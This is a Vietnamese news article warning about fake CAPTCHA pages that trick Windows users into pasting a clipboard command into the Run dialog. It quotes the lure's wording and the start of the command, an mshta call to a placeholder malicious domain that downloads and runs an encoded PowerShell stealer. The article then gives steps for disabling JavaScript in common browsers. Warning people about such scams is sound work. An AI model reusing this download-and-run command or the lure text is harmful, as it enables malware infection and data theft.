Người dùng internet không lạ gì với CAPTCHA, chính điều đó có thể khiến họ sập bẫy.
Trong thời buổi internet phổ cập tới mọi ngóc ngách Trái Đất, kẻ gian trên mạng đang ngày một sáng tạo trong tìm cách lừa người dùng. Thời gian gần đây, ngày một nhiều những vụ tấn công diễn ra thông qua một thứ mà người dùng internet đã quá quen thuộc: CAPTCHA.
Là chữ viết tắt của “Completely Automated Public Turing test to tell Computers and Humans Apart” (Phép thử Turing công cộng hoàn toàn tự động để phân biệt máy tính với người), CAPTCHA là cơ chế giúp các dịch vụ trực tuyến hạn chế các lượt truy cập tự động, vốn có thể làm suy giảm tài nguyên của doanh nghiệp.
Dễ hiểu hơn, CAPTCHA là hàng rào ngăn các phần mềm tự động truy cập liên tục, có thể gây nghẽn mạng; nó là một công cụ đơn giản để phân biệt người dùng thật và phần mềm truy cập tự động.

CAPTCHA đã là một phần tất yếu của không gian mạng – Ảnh: Internet.
CAPTCHA rất đa dạng: khi thì gõ một dòng ký tự đã được biến đổi đôi chút, khi thì ghép hình sao cho khớp, có lúc lại yêu cầu người dùng chỉ ra đâu là hình mèo, hình xe đạp hay hình đèn giao thông.
Trong nỗ lực đánh cắp thông tin người dùng, một số kẻ gian đã tạo ra một loại hình CAPTCHA độc hại mới. Như trong trường hợp dưới đây, khi người dùng muốn truy cập vào một trang nội dung như phim ảnh, âm nhạc, chia sẻ hình ảnh hay bài báo, một dòng thông báo sẽ hiện lên như sau:

CAPTCHA này đã quá quen thuộc: tick vào ô trống để khẳng định rằng “Tôi không phải người máy” – Ảnh: Malwarebytes Labs.
Tuy nhiên, sau chi tick vào ô trống, người dùng sẽ bị đưa tới địa chỉ mới, hiển thị nội dung yêu cầu người dùng làm theo hướng dẫn.
Không ít người dùng sẽ bị những chỉ dẫn “dường như vô hại” này đánh lừa, và nếu làm theo chúng, thiết bị chạy Windows của người dùng sẽ tự tải file độc hại về máy.
Người dùng bị lừa như thế nào?
Trang web vừa được người dùng truy cập sẽ copy một đoạn văn bản ngắn vào bộ nhớ đệm của máy (cũng tương tự như khi bạn bấm tổ hợp phím Ctrl+C). Phải nói thêm, trên các trình duyệt gốc Chromium – tức là hầu hết các trình duyệt thông dụng hiện nay, website chỉ có thể làm điều này khi bạn cho phép.

Nội dung như sau:
“Thực hiện những bước xác thực dưới đây:
Để chứng minh một cách tốt hơn rằng bạn không phải người máy, hãy:
1. Bấm và giữ nút Windows và R.
2. Trong hộp thoại xác nhận, bấm Ctrl+V
3. Bấm Enter để hoàn thành
Bạn sẽ quan sát được và đồng ý với nội dung sau:
‘ Tôi không phải người máy – ID Xác nhận reCAPTCHA: 8253 ‘
Thực hiện những bước trên để hoàn thành việc xác thực.”
Khi bạn click vào ô trống khẳng định “Tôi không phải người máy”, Windows đã cho rằng bạn đồng ý với việc copy văn bản vào bộ nhớ đệm của máy. Hành động này không có gì đáng ngại, cho tới khi bạn thực hiện những bước hiện tiếp theo.
Bằng một thủ thuật kỹ nghệ xã hội tinh vi, lừa người dùng thực hiện hành động vẫn làm khi lướt web, kẻ gian đã dẫn người dùng tới một bảng chỉ dẫn thực hiện những hành động sau:
1. Bật hộp thoại Run trên Windows.
2. Điền vào hộp thoại nội dung đang được lưu trên bộ nhớ đệm, là một đoạn văn bản ngắn.
3. Bấm Enter và qua đó, thực thi lệnh tải mã độc về máy.
Trong phần chỉ dẫn, có dòng chữ “ Bạn sẽ quan sát được và đồng ý với nội dung sau: ‘Tôi không phải người máy – ID Xác nhận reCAPTCHA: 8253’ ”. Nhưng thực tế, dòng chữ này chỉ là đoạn cuối của một lệnh tải dài. Phần đầu của nội dung được copy/paste có dạng như sau:
mshta miền độc hại}/media.file
Trên Windows, “mshta” là lệnh thực thi file lành tính có tên mshta.exe, nhưng trong trường hợp này, lệnh sẽ tải và chạy file độc hại lấy từ tên miền kia. Theo các nhà nghiên cứu bảo mật tại Malwarebytes Labs, những file lấy về đều có các đuôi thông dụng như mp3, mp4, jpg, jpeg, swf, html. Họ cho rằng file độc hại sẽ còn nhiều đuôi khác nữa.
Thực tế, những file này là một lệnh Powershell được mã hóa, sẽ chạy ngầm trong hệ thống và tải mã độc về. Trong một số trường hợp được kiểm tra, lệnh mashta đã tải về file độc, và file độc này tiếp tục tải về những phần mềm đánh cắp dữ liệu trên máy.
Làm sao để ngăn chặn phương thức tấn công này?
Đầu tiên và quan trọng nhất, chúng ta cần tỉnh táo khi sử dụng internet, nhất là khi cạm bẫy ngày một được bố trí tinh vi. Không nên làm theo chỉ dẫn đáng ngờ trên mạng, kẻo rước họa vào thân và rước file độc hại vào máy.
Nhân tiện nói tới chỉ dẫn, những bước sau đây sẽ giúp bạn vô hiệu hóa JavaScript trên một số trình duyệt gốc Chromium. Về cơ bản, một website có thể tự ý copy văn bản vào bộ nhớ đệm nhờ hàm JaveScript có tên document.execCommand(‘copy’) .
Việc vô hiệu hóa JavaScript có thể hạn chế những cuộc tấn công theo cách này, tuy nhiên nó có thể khiến một số trang web bạn vẫn sử dụng không hoạt động bình thường.
Dưới đây là cách tắt JavaScript cho một số trình duyệt thông dụng.
Chrome
1. Mở Chrome và nhấp vào biểu tượng ba chấm ở góc trên bên phải.
2. Chọn Cài đặt từ menu thả xuống.
3. Ở thanh bên trái, nhấp vào Quyền riêng tư và bảo mật .
4. Chọn Cài đặt trang web .
5. Cuộn xuống phần Nội dung và nhấp vào JavaScript .
6. Chọn Không cho phép trang web sử dụng JavaScript.
7. Bạn cũng có thể thêm các trang web cụ thể vào danh sách Chặn hoặc Cho phép bằng cách nhấp từng mục tương ứng.
Firefox
1. Nhập about:config vào thanh tìm kiếm, chọn Chấp nhận rủi ro và tiếp tục .
2. Nhập javascript.enabled vào ô tìm kiếm ở đầu trang.
3. Nhấp vào tùy chọn javascript.enabled để chuyển giá trị thành false (tắt JavaScript).
Opera
1. Mở Opera và nhấp vào biểu tượng Cài đặt .
2. Chọn Quyền riêng tư & Bảo mậ t.
3. Nhấp vào Cài đặt trang web.
4. Chọn tùy chọn JavaScript.
5. Chọn Không cho phép trang web sử dụng JavaScript để tắt JavaScript trên tất cả các trang.
6. Để tắt JavaScript cho từng trang cụ thể, nhấp vào Thêm trong phần Không được phép sử dụng JavaScript , sau đó nhập URL của trang web.
Microsoft Edge
1. Mở Microsoft Edge và nhấp vào biểu tượng ba chấm ở góc trên bên phải.
2. Chọn Cài đặt từ menu thả xuống.
3. Ở thanh bên trái, nhấp vào Cookies và quyền trang web.
4. Cuộn xuống phần Tất cả quyền và chọn JavaScript.
5. Gạt công tắc để tắt JavaScript.
6. Bạn cũng có thể quản lý JavaScript cho từng trang bằng cách thêm chúng vào danh sách Chặn hoặc Cho phép .
Điều hòa cân bằng nhiệt độ cho gia đình nhiều thế hệ từ LG
NHÀ MA TẬP 165 | GIẾT DÂU NGHÈO YỂM BÙA CON TRAI | CHUYỆN MA KINH DỊ – MC DUY THUẬN | FULL 4K
Hướng dẫn 6 cách đánh số trang trong Word đơn giản, nhanh chóng
Hoang mang khi phát hiện nuôi con bằng sữa giả
EP07预告:案件新线索浮现,苟凌风与马缨丹携手破解江湖谜题【侠客行不通Hidden Master】 #徐志胜 #范静祎 #王帅
Nhạc 8D Remix 'Nhớ Đeo Tai Nghe' – Top 15 BXH Nhạc Trẻ Remix Hot Tiktok 2024 ♫ Nonstop Vinahouse
Góc nhìn 365: Sữa giả, kẹo giả và nỗi lo thật
Hướng dẫn cách nấu lẩu đuôi bò thuốc bắc đơn giản tại nha
Trận đại hồng thủy lớn nhất trong lịch sử Trái Đất
Nam diễn viên nổi đình đám của showbiz Việt: U50 chưa dám lấy vợ, đời thực nhiều biến cố như phim
Podcast là gì? Nghe Podcast ở đâu? TOP kênh Podcast được ưa chuộng nhất 2025
Nhạc Không Lời Buổi Sáng Thư Giãn Cả Ngày | Hòa Tấu Rumba Guitar | Nhạc Cafe Buổi Sáng
Ngâm nước muối – bí quyết ‘vàng’ trong ẩm thực
MIXBEAT | CHỜ TRÔNG AI – NAL | QUANG HÙNG
Vì sao tài khoản vẫn âm thầm bị lừa đảo hack cả trăm triệu đồng dù đã có xác thực sinh trắc học?
Nghị quyết của Ủy ban Thường vụ Quốc hội về sắp xếp đơn vị hành chính năm 2025
CLB Đông Nam Á làm nên lịch sử khi vượt qua đội bóng của Nhật và Australia để vào chung kết giải đấu của AFC
Hướng dẫn cách đăng ký gói 5G chơi Liên Quân, chiến game mượt mà không lo giật lag
Bàn phím gaming giá tốt nhất tháng 4, chỉ từ 840K, duy nhất tại Thế Giới Di Động
Truyện ma Nguyễn Huy kể : NHÀ ÔNG BÁ TRẢ NGHIỆP – Phần 2 kết
Nhạc Buổi Sáng Thư Giãn | Hoà Tấu Guitar Không Lời | Nhạc Phòng Trà Nhẹ Nhàng Thư Giãn
ENG SUB《神印王座》Throne of Seal EP153 | 龙皓晨陨落,采儿挑战永恒之塔,寻找伊莱克斯复活皓晨 | 腾讯视频 – 动漫
Nhắn tin ‘chất vấn’ Sơn Tùng, một streamer nhận được câu trả lời không tưởng
Bayern Munich vẫn tin vào một cuộc lội ngược dòng
Điểm trùng hợp thú vị của hai ‘đạo diễn trăm tỷ’ Lý Hải và Victor Vũ
Nên mua ghế massage loại nào? TOP 10 thương hiệu không thể bỏ qua
NHẠC REMIX TIKTOK TRIỆU VIEW GÂY BÃO 2025 – TOP 20 BXH Nhạc Trẻ Remix MỚI HOT – MẤT KẾT NỐI REMIX
Mình là gì của nhau Quang Hùng Channel
Mẹ biển – Tập 23: Đại quyết định ở lại xóm chài
Thấy gì từ show truyền hình của Meghan – Nữ công tước xứ Sussex?
Mỹ nam Reply 1988 tiều tụy không thể nhận ra sau khi bị tố chụp ảnh 19+ cùng phụ nữ lạ
GẶP NHƯNG KHÔNG Ở LẠI COVER #CHILLCOVER
BXH Nhạc Trẻ Remix Hot Nhất 2023 ♬ Anh Em MaCau, Westside Squad ♬ EDM Trend TikTok
Rò rỉ đoạn hội thoại giữa CEO Amazon Cloud và nhân viên: trong tương lai, khả năng coder sẽ không còn lập trình nữa
Bí quyết rã đông nhanh gấp 10 lần bằng ‘nước đá ngược’
ANTARES | Trailer EP04 Pandainya Ares Menggoda, Bikin Baper Nih | WeTV Original
Tổng thống Nga khen ngợi Elon Musk, so sánh với huyền thoại không gian Liên Xô
ghitar quang hùng âm thầm bên em chắc ai đó sẽ về
LỆ TÌNH .8 Tâm Sự Tuổi 30 | QUANG HÙNG
Trấn Thành thu nhập khủng cỡ nào mà sở hữu căn phòng đồ hiệu triệu đô?
Sự thật xúc động về mâm cơm chiến sỹ trong lễ giỗ của người miền Tây
Chuyến thăm cấp Nhà nước đến Việt Nam của Tổng Bí thư, Chủ tịch nước Trung Quốc Tập Cận Bình thành công tốt đẹp trên mọi phương diện
Đàm Vĩnh Hưng hết bị cấm hát, phản hồi tin trở lại biểu diễn
[THUYẾT MINH] Rắn Khổng Lồ Tấn Công Trường Nữ Sinh | Phim Kinh Dị 2022 Cực Hot | Phim Lẻ YOUKU
Một hãng smartphone đình đám hoãn ra mắt điện thoại màn hình gập thế hệ mới vì doanh số không như kỳ vọng
Jennie (BlackPink) bùng nổ ở Coachella
Gặp những chiến sĩ cứu hộ cứu nạn trong trận động đất tại Myanmar
Giao lưu hữu nghị quốc phòng biên giới Việt Nam – Trung Quốc lần thứ 9
#CHILLCOVER | ta có hẹn với tháng 5 guitar quang hùng
Đồng bào dân tộc Khmer tại Hậu Giang rộn ràng đón Tết Chôl Chnăm Thmây
ANTARES | Highlight EP02 Ares Yang Merasa Penasaran Terhadap Zea | WeTV Original
Động lực tăng trưởng của bất động sản Thủy Nguyên